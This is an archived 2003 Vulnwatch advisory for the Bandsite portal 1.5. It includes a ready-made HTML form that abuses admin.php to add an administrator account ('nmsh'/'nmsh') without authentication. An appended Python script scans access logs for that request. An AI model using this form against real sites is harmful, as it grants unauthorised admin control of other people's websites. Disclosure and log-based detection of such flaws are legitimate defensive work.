Vulnwatch mailing list archives

Vulnerability in Bandsite Allows Gaining Admin Access


From: "NaSsEr .M.Sh" <nmsh_sa () yahoo com>
Date: Fri, 12 Sep 2003 03:47:15 -0700 (PDT)

Information :
°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : Jelle de Vos
- Tested version : 1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, 
guestbook, tour guide, an admin section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
=====================   nmsh.htm    ==============================
      <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
        <TBODY>
        <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
   Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
   Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
Now go to this link:
http://[target]/bandwebsite/login.php
and log in as admin
name : nmsh
pass : nmsh

Vendor:
°°°°°°°
Vendor has been contacted, no reply received. 

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com
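
For administrators who want to check whether a Bandsite install has already received the request shown in the advisory, one approach is to search the web server access log for it. This is an added example, not part of the original post or of Bandsite; it assumes Apache combined-format logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_admin_add_request(method, target):
    """True for a POST to admin.php carrying Login and section=admins
    in the query string, the request shape shown in the advisory."""
    parts = urlsplit(target)
    if method != "POST" or not parts.path.lower().endswith("/admin.php"):
        return False
    # The advisory URL begins "?&Login=1"; parse_qs skips the empty field.
    query = parse_qs(parts.query, keep_blank_values=True)
    return "Login" in query and "admins" in query.get("section", [])

def find_suspect_requests(lines):
    """Return (ip, time, status) for each log line matching the pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_admin_add_request(m["method"], m["target"]):
            hits.append((m["ip"], m["time"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges, invented times).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2003:11:02:01 +0000] "GET /bandwebsite/index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [12/Sep/2003:11:05:44 +0000] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.0" 200 812 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [12/Sep/2003:11:06:10 +0000] "POST /bandwebsite/login.php HTTP/1.0" 302 0 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [12/Sep/2003:11:09:30 +0000] "GET /bandwebsite/admin.php?section=admins HTTP/1.0" 200 2048 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, when, status in find_suspect_requests(SAMPLE_LOG):
        print(f"review: {ip} at {when} (HTTP {status})")
```

A hit shows only that the request was received; compare each one against the admin accounts that exist in the application and the addresses your own administrators use.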

